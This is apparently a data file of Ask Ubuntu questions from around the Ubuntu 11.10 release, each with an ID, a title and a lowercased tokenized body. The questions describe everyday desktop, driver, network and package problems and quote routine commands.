69610	the keyboard sometimes does n't work	i just installed oneiric . the problem that i have with the unity desktop is that it 's slow , and sometimes the keyboard just stops working while the mouse moves and i can click . at the same time i can press ctrl-alt-f1 to go to login mode and kill xorg to come back . the thing that bugs me is that this is hapenning a lot of times and i 'm thinking about installing gnome 2 . i tried installing gnome-session-fallback but this does n't seem to be a good gnome2 shell . does anyone know how to solve the keyboard issue ? or anyone knows how to install a decent gnome shell on oneiric ? thanks ,
69612	unreachable ip on local subnet	i have a network printer at 192.168.2.101 that i can reach just fine with other machines on my network ( ping and access the printer web server ) . for some reason i ca n't access the printer from my ubuntu machine -- pings return host unreachable . i 'm running ubuntu 11.04 ifconfig eth1 link encap : ethernet hwaddr 38:59 : f9 : c4:52 : a9 inet addr:192.168.2.11 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :3a59 : f9ff : fec4:52a9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:167828 errors:0 dropped:0 overruns:0 frame:2000398 tx packets:116132 errors:16 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:213283954 ( 213.2 mb ) tx bytes:15552076 ( 15.5 mb ) interrupt:16 edited oct/20/2011 i 've added the requested diagnostics below . any hints in here ? ip route show $ ip route show 192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.11 metric 2 169.254.0.0/16 dev eth1 scope link metric 1000 default via 192.168.2.1 dev eth1 proto static traceroute $ ip route show 192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.11 metric 2 169.254.0.0/16 dev eth1 scope link metric 1000 default via 192.168.2.1 dev eth1 proto static netstat $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 192.168.2.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth1 0.0.0.0 192.168.2.1 0.0.0.0 ug 0 0 0 eth1 edited nov/2/2011 after a bit more digging it appears this might be an issue with mac address translation . arp yeilds $ arp address hwtype hwaddress flags mask iface 192.168.2.101 ( incomplete ) eth1 192.168.2.1 ether 00:17:3f:90 : cd:93 c eth1 i 've tried adding a static entry , per this post add static arp entries when network is brought up , but the result is the same . any thoughts ?
69615	how do i stop the screensaver from coming on during vlc movie watching ?	i am using ubuntu 11.10 and my screensaver keeps coming on while i 'm watching a movie . i do n't remember this happening in 11.04 and ca n't remember how to stop it ?
69616	how to install pymedia without compiling prereq 's from source ?	i 'm trying to install pymedia : http : //pymedia.org/ on ubuntu . i 'm fine with building pymedia itself from source , as that seems my only option , but i 'd rather not have source built versions of its prerequisites lying around if i can avoid it . i installed most of the prereq 's with the following : sudo apt-get install python-dev libogg-dev libvorbis-dev libfaad-dev libasound2-dev libmp3lame-dev then i downloaded the pymedia source tarball and ran : python setup.py build with that i get : ogg : found vorbis : found faad : found mp3lame : found vorbisenc : found alsa : found continue building pymedia ? [ y , n ] : which looks good . i hit yes.. and it errors out with : # ... g++ -pthread -shared -wl , -o1 -wl , -bsymbolic-functions build/temp.linux-x86_64-2.6/sound/sound.o build/temp.linux-x86_64-2.6/sound/resample.o build/temp.linux-x86_64-2.6/sound/fft.o -logg -lvorbis -lfaad -lmp3lame -lvorbisenc -lasound -o build/lib.linux-x86_64-2.6/pymedia/audio/sound.so /usr/bin/ld : build/temp.linux-x86_64-2.6/sound/sound.o : relocation r_x86_64_32 against `.rodata.str1.1 ' can not be used when making a shared object ; recompile with -fpic build/temp.linux-x86_64-2.6/sound/sound.o : could not read symbols : bad value collect2 : ld returned 1 exit status error : command 'g++ ' failed with exit status 1 what gives ?
69621	where are the session managers logs ?	unity 3d refuses to start here , always falling back to unity 2d . i installed both gnome and xfce 4 and neither starts , but instead leave me with the mouse cursor and the wallpaper . i want to know what is happening . where are the session manager logs ? where can i see what processes failed to start ? where can i read what they printed to stdout and stderr before they crashed or failed to start properly ?
69633	new connection does n't show up in list of networks	i added a new profile for wired connection in ubuntu 's network manager|edit connections|wired , but the new connection does n't show up in the list of networks when i click on the network icon in system tray . does anyone know how to fix it ?
69636	share folders from guest os to windows host os virtualbox	so most articles are focused on the virtualbox forcing a folder into the guest os . i want to do the opposite , share a folder out of to the host os . i tried doing the automagic share folder via nautilus menu and that did n't work . the computer also fails to show up in the host os 's list of computers in the network . it works fine with other full linux os 's .
69640	chromify osd is n't working in 11.10 ?	based on these instructions , i have installed the google chrome / chromium extension chromify-osd . but i ca n't see it working properly . look at this image to know what i mean . how to make these notifications look like notify osd ?
69645	how to have the brightness icon displayed on acer laptop screen	i used to have a meter icon displayed on my acer laptop screen when changing brightness or volume with the hotkeys - it would show the level of adjustment . i do n't know what has been turned off or disabled since ( maybe something in startup disabled ? ) , but now the icon is no longer displayed on screen but i can still adjust the levels with the hotkeys . please help me and let me know how to get the brightness and volume meter icon to display on screen again . thank you in advance .
69648	gnome shell : pressing the super key does not work	i am using 11.10 with gnome 3.2 and completely loving it . on one computer it works like a charm , but on another computer the super does not show the activities window . mousing over the top-left corner does bring up the window , so i am not totally blocked , but i am really missing being able to just press the key to get there . does anybody have a clue how i could fix this ? [ update ] in system settings , keyboard , there is an option to change the shortcut for show the activities overview , but i ca n't set it to super ( i guess because it is considered to be a modifier-key ) . any idea how i can solve that ?
69650	how do i archive/compress files using the right click menu in nautilus-elementary ?	in lucid , after selecting a bunch of files , when you right-clicked on the selection in the file manager , you could select compress and a nice simple window came up for doing just that . in oneiric , i can not find that option . so somebody please tell me what i might be missing ? some of the things in unity are really irritating . i did have nautilus from the nautilus-elementary ppa installed instead of the normal version .
69656	are there any lenses for empathy or pidgin ?	i see gwibber lenses , is there anything for empathy or pidgin ? for search my contacts , open tab chat or others..
69658	can i control where windows open in gnome classic ?	i am running ubuntu 11.10 oneiric with gnome classic and compiz . when i open some applications , they appear near the top of the screen , underneath the top panel . this means i ca n't grab the to bar of the window to move them . is there a way i can prevent this , either by controlling where the default space on the desktop is to open new windows , or by creating some space around the top panel which they ca n't go into ?
69662	how can i open the applications and files lenses from command line ?	can someone tell me if there is a application or script that can be called from the terminal screen that will bring up the find applications or find files window that comes up when you click the more apps an find files button in the dash home ? thanks in advance for any comments suggestions .
69663	iphone mount errors	when i plug my iphone ( ios 5 ) into my laptop with ubuntu 11.10 , i get this error : unable to mount documents on iphone . location is already mounted followed by this error : unable to mount iphone . location is already mounted after i see these errors , the `` documents on iphone '' folder pops up . how do i fix this ?
69666	how do i clear old installation files ?	i recently updated to 11.10 with a few challenges . it seems i have a few left over files from the previous installation . because when booting the system , i am given options to choose which version of ubuntu i want to boot up . there is not any obvious difference between the separate options i am given . how do i clear the files/options i do not need ?
69667	run jnlp applications with root permissions	there is an application called keytooliui , a java application that works with certificates , i want to give to it the root permission to be able to edit cacerts , when i am trying to run it from terminal as root , it gives me the following error : root @ deveto : ~ # -bash : keytool-iui.jnlp : permission denied should i run it in other way ? or it is n't possible ?
69668	window menu bar issue	i installed ubuntu natty ( 11.04 ) a while ago and also compizconfig settings manager ( ccsm ) for better display effects . this was working fine till now but since a few days ago due to some unknown reason 1 ) the minimize , maximize , close buttons get disappeared at start-up . 2 ) even the show desktop button when clicked shows `` your window manager does not support the show desktop button , or you are not running a window manager '' and the window switcher also doesnt work . they were only restored when i ran the command `` compiz -- replace '' or `` metacity -- replace '' in the terminal everytime after the system booted up which not only restored all my windows back to normal as they were after i had installed natty but also led to the terminal hanging up as if it was closed then it called for a reboot as i virtually couldnt access anything simultaneously . now i uninstalled compizconfig settings manager ( ccsm ) as well as unity and kept only the metacity but i still face the problem which gets resolved only after i run `` screen metacity -- replace '' on every reboot please help me with a solution that will restore my windows back to normal permanently and which doesnt involve typing or running anything everytime in the terminal after boot . thanks a million
69669	how do i change the default browser ?	despite chromium being set as my preferred web browser under `` system info '' , when i click a link in an im window of pidgin , it opens in firefox . how do i make it so that links open in chromium ? i am running : ubuntu 11.10 chromium-browser 14.0.835.202~r103287-0ubuntu1 pidgin 1:2.10.0-0ubuntu2 edit : i also tried sudo update-alternatives -- config x-www-browser and selected chromium ( in both auto and manual mode ) , but after running sensible-browser & it still loads firefox . chromium is also set to the default browser within the chromium - > preferences - > default browser panel .
69671	how do i set my bluetooth keyboard 's layout setting ?	i have upgraded to 11.10 and i have a hp mini 2140 with a swiss layout keyboard . i could set that on the system setting and for the keyboard i have no problems . but i also use a logitech dinovo edge bluetooth keyboard when i 'm at home , and there is no way to set it in the right layout ( the french swiss one ) . how can i correct that ? it 's very strange because when i connect my logitech keyboard is set on the american layout , but the one of the pc is still on the swiss french layout .
69679	how to make unity dash background darker ?	how do you make the unity dash background darker like in natty ? blur effect is too laggy and without the blur , it becomes confusing .
69692	video playing faster than sound in vlc player	i 've googled this issue and most of the time people have faster audio but slower video . for me it 's the other way around . it does n't matter what type of files i play . i would be glad to put up more info if you guys need it . thanks in advance !
69695	driver for intel hd 3000 ( core i7 2630qm )	ubuntu 11.10 ca n't recognize my intel hd 3000 , where can i download the driver ? the ouput of lspci -vnn | grep vga is 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) ( prog-if 00 [ vga controller ] )
69697	need help to remove ati proprietary driver . and go back to default	i did have gallium 0.4 , on rv710 ati driver . my gnome-shell did work well on that driver , there was n't a glitch on the topbar . i installed wine to play nfs : mw . it had a weird glitch , the textures were n't fully loaded . so i installed ati proprietary drivers from ati 's site.. then i did a restart . the gnome-shell , was with the glitch i heard about the topbar was like a `` rainbow '' . so i decided to remove fglrx , ati proprietary drivers . i did took some steps to fully remove it . i did restart my notebook . the gnome was in the `` fallback session '' and if i look into the systeminformation . i do n't even see a driver installed at the graphics tab . so now i want to go back to the gallium 0.4 on rv710 ati driver . can somebody post for me a tutorial how to do this ? in steps please . i am just an beginner in linux ( ubuntu ) , and my english is not so gooed so be friendly please . : ) greetings , furkan
69700	how to run gtalk app with wine ?	i used to use gtalk application alot when i used windows and i still use it at work . at home , where i use ubuntu 10.04 , i usually use pidgin or empathy for using connecting to google talk . but i dont like the interface of any of these apps . so i am looking for some help with run gtalk app with wine . i tried installing gtalk using wine sometime ago but didnt succeed and unfortunately i dont remember the error that i got . how do i do this . has any one succeeded in doing this . update i have tried installing gtalk using wine and after the setup completes and gtalk opens , i get a dialog saying `` gtalk has encoutered an internal error and needs to close . please report this error to google '' and when i click ok on that dialog box , gtalk quits .
69701	how to install sopcast-player ?	all the ppa 's i used are for natty or older . how can i install sopcast in oneiric ? i prefer through a ppa if it exists . should i try the ppa for natty ? will it work ? i mean the ppa from here usually i install it from ubuntu tweak . but now ubuntu tweak is in alpha for oneiric , with a new interface . i could n't find it there , or any other software . explain that ?
69706	is it safe to uninstall gdm , when using lightdm	i 'm trying to clean up my system by removing unnecessary packages . is there any drawback when doing a sudo apt-get purge gdm ?
69716	lenovo ideapad s205 suspend/hibernate problem	i 'm currently using ubuntu 11.10 on my laptop . at first the wifi did n't work so i ran rfkill unblock wifi rfkill unblock all modprobe -r acer_wmi now the wifi works , however when i try to suspend/hibernate the computer . it gets stuck . what should i do ? update whenever i try to run pm-hibernate , the computer goes into hibernation for a split second and comes back .
69720	how to remove keyboard indicator ?	/desktop/gnome/peripherals/keyboard/general/disable_indicator in gconf is set to yes additionally i restarted , but it 's still there . maybe there is some setting buried in ccsm ? here is screenshot of what i 'm talking about if it 's not clear : i want to remove it if possible
69722	applications missing in `` other applications list '' - how to change default application ?	i am running ubuntu 11.10/64 bit with unity 3d on a intel® core™ i5-2400 cpu @ 3.10ghz × 4 computer . i am currently trying to use texstudio as the default application for opening *.tex files , but i can not change the default application associated with that file type . i tried to change it by right-clicking on a .tex-file , then `` properties '' , `` open with '' , `` show other applications '' but however , neither texmaker nor texstudio will appear in the programme list and oddly enough , there is no `` add application '' button anymore , to add an application to that list by hand . i tried to make an entry in my /home/my home folder/.local/share/applications/mimeapps/mimeapps.list , nothing happened , still opening the files with gedit . is there no way to change the list of `` other applications '' or add an default application programme manually , i.e . by editing some file ? thanks for your help . d
69723	how can i configure my server so that my domain points to it ?	i have bought a domain name ( without hosting ) , and at home i have a static ip address on ubuntu server 11.04 . how can i redirect users to my web server at home ? what configuration needs to be done ?
69728	package emacs-snapshot-nox has unmet dependencies	i 'm trying to install emacs24 for an external repository , but i receive an error regarding unmet dependencies and wonder how i can continue the installation and resolve this error ? the output looks like this : dito @ dito : ~ $ sudo apt-get install emacs-snapshot-nox reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : emacs-snapshot-nox : depends : emacs-snapshot-bin-common ( = 1:20111012-1+squeeze1 ) but it is not going to be installed depends : libncurses5 ( > = 5.7+20100313 ) but 5.7+20090803-2ubuntu3 is to be installed predepends : dpkg ( > = 1.15.6 ) but 1.15.5.6ubuntu4.5 is to be installed e : broken packages dito @ dito : ~ $
69733	move /home to a different disk	currently my /home partition and / are on different disks ( configured at install time ) . can anyone guide me to move the /home directory to the disk where my / currently resides in ?
69738	how to set up system to boot from read-only ssd and store data on hd	i 'm getting a new laptop with a hard drive and a ssd drive . i plan to install 11.10 . i plan to partition in such a manner that : i put the files that ( almost ) never change on the ssd and mount it as a read-only partition . i put /home/ on the hd ( and other locations that routinely are written to during normal operations , see question 1 below ) i basically want to not worry about the ssd getting worn out . two questions : what other locations ( than /home ) need to be put on the read-write hard drive ? i need to modify my system from time to time : install some new packages , update packages , edit /etc/ configuration files , whatever . is it possible set the read-only partition temporarily to read-write , do the changes and then change it back to read-only ? update some interesting links : http : //www.logicsupply.com/blog/2009/01/27/how-to-build-a-read-only-linux-system/ http : //en.gentoo-wiki.com/wiki/network_boot_from_read-only_server update 2 more interesting links . the first link describes an effort to replace various filesystem locations that stores transient state files with a /run toplevel location . making the /run directory available brings us a step closer to the point where it is possible to use the system normally with the root filesystem mounted read-only , without requiring any clunky workarounds such as aufs/unionfs overlays . http : //wiki.debian.org/releasegoals/rundirectory http : //en.wikipedia.org/wiki/aufs
69739	will not boot to prompt after do-release-upgrade ; gdm not running xserver	oneiric will not boot to prompt after do-release-upgrade ; gdm not running xserver but it will boot a previous kernel version . where are the log files ? the hdd has been running something for 3 hours .
69742	can i shorten the timing in the alt+tab dialog ?	i like the new alt+tab dialog in oneiric , but when i stop on an application it takes too long to break into the window-select mode . it seems like it takes a second or even more , and i 'd like it to be around a quarter of that time . can i change this behavior and shorten the time it takes to break into windows ? i 've seen this question , but it seems to be asking about the initial dialog display , not the secondary one .
69744	run .net 2.0 applications for win	i am trying to run application for windows on ubuntu 11.10 i tried wine /path/to/file.exe error is : wine : install mono for windows to run .net 2.0 applications . i have mono ( seems to be not mono for windows ) mono /path/to/file.exe gives me error : the assembly mscorlib.dll was not found or could not be loaded . it should have been installed in the `/usr/lib/mono/2.0/mscorlib.dll ' directory . what do i need to do ?
69749	how to assign a vim as the default program for a file type and run it in maximized terminal ?	i want to assign a terminal based program as a default program in gnome shell 3.2 . i am running ubuntu 11.10 . more specifically , i want my .txt files to open in vim with maximized gnome terminal . the 'open with other application ' menu does not provide for this . thanks in advance for help .
69754	how can i create keyboard shortcuts for my nautilus scripts ?	in ubuntu i can create handy nautilus scripts by putting .sh files into ~/.gnome2/nautilus-scripts directory , and they will appear in the right click context menu in nautilus . in 11.04 , i used to be able to assign keyboard shortcuts for my scripts by editing in the file ~/.gnome2/accels/nautilus , but now in 11.10 this file is no longer there to edit . so how can i create keyboard shortcuts for my nautilus-scripts ?
69758	can i make a folder display the contents of several other folders ( like a windows `` library '' folder ) ?	windows 7 has a concept they call `` libraries . '' it 's a folder that links to other folders . the `` libraried '' folder will display the contents of all the folders it links to . so if folder-a contains video of jimmy 's october soccer games and folder-b contains video of jimmy 's november soccer games , i can link folder-a and folder-b to the library-folder and view thumbnails of all the october & november videos in one folder . i find this useful and was wondering if it 's possible to configure a similar thing in ubuntu ? it seems like i should be able to use mount to pull this off somehow but i do n't know how .
69761	how to change to default english language ?	i just accidentally set my ubuntu to chinese and i do n't understand anything that it says . this makes it difficult to change the language , although i had enter locale to change the language because it 's all in chinese . does anyone know how can i change my ubuntu 's default language using the terminal ?
69762	ubuntu 11.10 crashes on boot shows busybox	when i boot into ubuntu 11.10 it shows only a black screen stating `` busybox built in shell ( ash ) '' enter'help ' for list of keyword it was a fresh install , installed some basic componets such as 'ubuntu restricted extras ' and 'vlc media player ' and 'adobe flash' real problem is i can not boot into ubuntu instead it boots me up in busybox shell.i have included a screenshot .
69764	how can i permanently set the master volume level ?	previously in ubuntu , up until version 11.04 , once i set the master volume to a level , it stays that way ( regardless if i turn the machine off and back on ) until i manually change it . apparently , in version 11.10 , there is a default master volume setting . no matter what i set my volume to , when i reboot the system , it always returns to that default setting ( which for my tastes is a trifle too loud ) . is there any way to change that default setting to the setting that i wish ( about 50 % ) ?
69765	amdccc tear free option can not be enabled anymore ?	after installing the ati proprietary driver , i disabled the tear free option because it causes laggy windows and general slowdown of everything . but now i want to enable it again , to see whether it improves my video playing ( which has lots of screen tearing ) . the problem is whenever i try to enable the option , it gives me `` tear free desktop can not be enabled due to insufficient graphics memory '' . i do n't understand , as i could enable and disable it before no problems . i 'm running on an ati 4670 . thank you in advance !
69768	can i run an installed ( using wine ) windows executable file at startup ?	i have palm desktop for windows running under wine . os is ubuntu 11.10 . i have no problem executing the program , but would like to launch it during startup . any advice gratefully received
69776	how do i `` alt-tab '' between windows using gnome 3 ?	all of the references i 've found for gnome 3 keyboard shortcuts list that alt+tab switches between applications and alt+` switches between windows ( some actually say alt+~ , but i think they 're mistaken , and i 've tried both anyway ) . maybe that functionality works for gnome 3 on fedora or something , because no matter the key combo i try , nothing will switch between windows except for opening the alt+tab dialog and using arrow keys to navigate it ( and at that point it 's faster to just use a mouse.. ) . how do i quickly switch between windows in gnome 3 ?
69778	how to set up my gigabyte gt-e8000 tv card to work ?	i have a gigabyte gt-e8000 hybrid hd tv-tuner in my system . i wonder if i could make it work , tried several softwares , but no luck at all . i usually watch analogue broadcast ( through cable-tv ) and digital dvb-t as well , so both would be nice to work , and the remote controller too ( i have another remote controller , which designed to work with windows media center ) . the tv card has an nxp chipset ( nxp saa7160 hybrid capture device ) , and connected to pci-ex1 interface . if someone has any solutions or workaround to make it work , please share with me , and of course if there 's a good software for watching tv , recording , that would be nice too : ) !
69780	slow wireless with an atheros ar928x	i have problems with pb easynote tj65 and ubuntu 11.10 . the wifi connection is slower compared to 11.04 ... . annoying during live video streaming ( tv , etc ... ) could you help me , please ? here some info : sudo lshw -c network *-network description : ethernet interface product : netlink bcm5784m gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : 00:26:2d:5f:5c : c0 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.119 firmware=sb v2.19 latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : f3000000-f300ffff *-network description : wireless interface product : ar928x wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 70:1a:04:45:53 : c2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.0.0-12-generic firmware=n/a ip=192.168.2.102 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f3100000-f310ffff ifconfig eth0 link encap : ethernet hwaddr 00:26:2d:5f:5c : c0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3614 errors:0 dropped:0 overruns:0 frame:0 tx packets:3614 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:397638 ( 397.6 kb ) tx bytes:397638 ( 397.6 kb ) wlan0 link encap : ethernet hwaddr 70:1a:04:45:53 : c2 inet addr:192.168.2.102 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :721a:4ff : fe45:53c2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:53964 errors:0 dropped:0 overruns:0 frame:0 tx packets:49879 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : '' wlan-7bce36 '' mode : managed frequency:2.412 ghz access point : 04 : c0:6f : da:7b : ce bit rate=162 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=48/70 signal level=-62 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:1 invalid misc:2 missed beacon:0 cat /etc/network/interfaces auto lo iface lo inet loopback what should i do ? should i disable the n connection ? how ? and this ... what does it mean ? thanks a lot ! ! alessio
69781	random hangups since upgrade to 11.10	i randomly have mouse/unity/system hang-ups since the upgrade to 11.10 . i did't have any issues with 11.04 though . the mouse just freezes and the system is no longer responsive at all . no keystrokes are possible or any other interaction but to reset the system . the system does n't seem to crash , it just freezes . there are no usable log informations available as far as i can tell . this happend after a upgrade from 11.04 to 11.10 and on the installation process with the amd64 media on a fresh install . using the fglrx . the situation is the same with unity 2d . hardware : sapphire radeon hd6850 intel classic dp43bf any ideas ?
69787	need help installing a 32bit app on my 11.10 64bit . multi-arch not working	i thought the 11.10 was supposed to have a multi architecture support but installing a 32bit .deb gives me a 'wrong architecture ' error . what do i need to do to install this deb ? crossplatformui-v2.1.1-kasapa-i386-ubuntu.deb here is the output when i try to force the installation through the force architecture command selecting previously deselected package crossplatformui : i386 . ( reading database ... 186238 files and directories currently installed . ) unpacking crossplatformui : i386 ( from crossplatformui-v2.1.1-kasapa-i386-ubuntu.deb ) ... setting up crossplatformui : i386 ( 2.1.1 ) ... rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service acpid restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop acpid ; start acpid . the restart ( 8 ) utility is also available . acpid stop/waiting acpid start/running , process 2569 package libqtgui4 exist qt_version = 4 make -c /lib/modules/3.0.0-12-generic/build m=/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.0.0-12-generic' cc [ m ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:34:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o ] error 1 make [ 1 ] : *** [ _module_/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.0.0-12-generic' make : *** [ modules ] error 2 dpkg : error processing crossplatformui : i386 ( -- install ) : subprocess installed post-installation script returned error exit status 2 processing triggers for gnome-menus ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... errors were encountered while processing : crossplatformui : i386 can someone help ?
69793	why does empathy shutdown automatically when i open it ?	when i try to open empathy it will log in into the accounts and then shutdown automatically . i have to open empathy several times to use it and suddenly while using it , it shuts down again . by `` shutdown '' i mean not the entire system but empathy only .
69794	uninstall ubuntu one for windows 7	i recently installed ubuntu one for windows and now would like to uninstall it . problem is ; there is no uninstall.exe to be found in the start menu or in the ubuntuone folder . there is a uninstall ubuntu one shortcut , but it does not lead anywhere . also i can not delete the folder because it says it is in use . any thoughts ?
69798	where can i set the default programs ?	where can i set the default programs/applications on ubuntu 11.10 in order to set vlc as the default video player ( and not manually associate each file format with vlc ) ? i 'm on gnome shell .
69804	how do i change the keymap of a single device ( logitech presenter ) ?	my logitech r400 presenter sends the following key codes : keycode 112 ( keysym 0xff55 , prior ) [ page up ] keycode 117 ( keysym 0xff56 , next ) [ page down ] keycode 60 ( keysym 0x2e , period ) keycode 71 ( keysym 0xffc2 , f5 ) keycode 9 ( keysym 0xff1b , escape ) basically , i want to use this presenter to remotely control banshee , so i 'd like to remap prior to b , next to n , and so on . how can i change the keymap for this device only ( as i certainly do n't want to remap those key codes globally ) ?
69806	how to compile gedit latex plugin ?	because i 'd like to use the gedit latex plugin that is unfortunately not available for gedit 3.2 in the repositories , i want to compile it myself . the most recent version you can get on http : //git.gnome.org/browse/gedit-latex does support gnome 3 's gedit . in the documentation it says : due to a limitation on reading settings , the plugin currently must be installed in the same prefix as gedit . for instance if you are using gedit 3 from your distribution , you need to do ./configure -- prefix=/usr make sudo make install if you are using a 64bit distribution , you also need to pass -- libdir=/usr/lib64 to ./configure script . that 's why i cded into the directory that contains the code , and tried to run ./configure -- prefix=/usr -- libdir=/usr/lib64 . unfortunately , this does not work , giving the error message : bash : ./configure : no such file or directory having checked the folder , there indeed is no file configure , but only configure.ac . what can i do to compile this plugin ?
69807	how do i install xampp ?	can somebody please guide me to install xampp on ubuntu 10.10 or simply to a tutorial that works . i 've followed many tutorials from the web which unfortunately does n't work
69810	how do i add/remove the `` hidden '' startup applications ?	how do i manage ( add/remove ) all the startup applications in ubuntu 11.10 and up ? startup applications does n't show all the applications which are started during boot .
69814	unity 3d stops working after changing compiz settings	after i upgraded my ubuntu 11.04 ( that i had compiz ) to 11.10 and did some navigation in compizconfig settings manager , suddenly the main top panel and left launcher disappeared and i just have windows menu at the top instead of master panel ( master panel = top panel that have shut down , time and date , chat and ... ) . but it still working in ubuntu 2d . how can i reset my unity and why did this happen ?
69815	can i make eclipse use the ubuntu global menu ?	i 'm using eclipse indigo and i 'd like for it to use the global menu , like all the other applications on my system . is this possible , and how ?
69817	are there any free , high quality , career mode games for ubuntu ?	one of the most frustrating things about gaming on linux is that every game with some semblance of quality requires me to play with a bunch of obnoxious people online . are there any free linux games , with some degree of quality , that allow the player to play offline in a `` career mode '' ?
69818	is there a chat application that supports a proxy ?	i 've upgraded to ubuntu 11.10 and it seems that it has a lack of support for internet connections with a proxy . pidgin has stopped working , and when i go to the proxy tab , under the settings window , it says that it ca n't find the proxy configuration program ( after explaining that pidgin uses the gnome preferences ) . here i found this bug empathy seems that does n't support proxy neither , as you can see here and here my last hope was kopete , but seems that it also has n't proxy support : ( any idea on how to use a multi-protocol chat client in ubuntu 11.10 with proxy support ?
69819	how can i fix my ubuntu-tweak install ?	i 'm unable to run ubuntu tweak . it seems to have a problem with python or something , but i 'm not sure . here is the output : /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:47 : runtimewarning : you have imported the gtk 2.0 module . because gtk 2.0 was not designed for use with introspection some of the interfaces and api will fail . as such this is not supported by the pygobject development team and we encourage you to port your app to gtk 3 or greater . pygtk is the recomended python module to use with gtk 2.0 warnings.warn ( warn_msg , runtimewarning ) gtk-message : failed to load module `` rgba '' traceback ( most recent call last ) : file `` /usr/bin/ubuntu-tweak '' , line 53 , in < module > from ubuntutweak.main import ubuntutweakapp , ubuntutweakwindow , show_splash file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 31 , in < module > from ubuntutweak.gui.dialogs import errordialog file `` /usr/lib/python2.7/dist-packages/ubuntutweak/gui/dialogs.py '' , line 21 , in < module > from gi.repository import gobject , gtk , gdk , pango , vte file `` /usr/lib/python2.7/dist-packages/gi/importer.py '' , line 76 , in load_module dynamic_module._load ( ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 222 , in _load version ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 90 , in __init__ repository.require ( namespace , version ) gi.repositoryerror : requiring namespace 'gtk ' version '3.0 ' , but '2.0 ' is already loaded
69820	how do i set a pulseaudio card profile persistently across reboots	i 'm trying to set up pulseaudio 's card profiles , and i 've gotten profile switching to work using pactl set-card-profile , but so far when the machine reboots , the audio profile reverts back to the default of output : analog-stereo instead of remaining on hdmi . how can i set the profile in a way that persists across reboots ?
69822	show/hide either top panel or networkmanager applet from command line	we 're deploying application specific netbooks to users at a variety of sites . these are basically mobile kiosks that have very limited functionality . since we ca n't predict everyone 's connectivity situation , we need to provide some access to network manager . our application can tell when it 's not connected to the internet . i 'd like to show network-manager at those times via nm-applet . i can think of two possible solutions , but i have n't found any way to implement them . keep the nm-applet on the top panel , but hide that panel . when connectivity is lost , show the panel . remove the panel , and somehow show the nm-applet . any ideas ?
69827	what default fonts are used ?	i was wondering what fonts are used in ubuntu 11.10 and are they open source ? the fonts used in ubuntu have very cute armenian character support , that 's why i would like to know them , so i can install them on my symbian smartphone whose fonts do not have armenian character supprt . edit : i would love to get additional information . in firefox web browser the armenian characters are displayed properly , and i would to know exactly which one of the fonts is the one used in firefox as there are a lot of fonts in the downloaded archive . â
69829	where do i look to find out why it takes so long to log out of ubuntu now that i have upgraded to 11.10 ?	now that i have upgraded to 11.10 , the logout process takes ages ( 2 minutes+ ) and sometimes pops up a box stating that my keyring was not unlocked and asking for the unlock password . any suggestions on where to start looking for answers ?
